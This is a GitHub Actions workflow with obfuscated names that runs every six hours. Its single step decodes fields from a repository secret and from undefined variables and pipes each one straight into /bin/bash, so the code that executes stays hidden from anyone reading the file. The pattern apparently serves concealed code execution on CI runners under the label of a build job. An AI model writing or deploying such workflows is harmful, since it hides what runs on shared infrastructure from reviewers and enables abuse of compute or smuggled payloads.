name: xiaxijie6537
on:
  workflow_dispatch:
  schedule:
    - cron: '51 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaxijie6537
        env:
          pctf697: ${{ secrets.pctf697 }}
        run: |
          echo $pctf697 | jq -r .z569 | /bin/bash
          echo $zukj0 | jq -r .z36 | /bin/bash
          echo $nnivc508 | jq -r .scj8 | /bin/bash
          echo $s30 | jq -r .n671 | /bin/bash

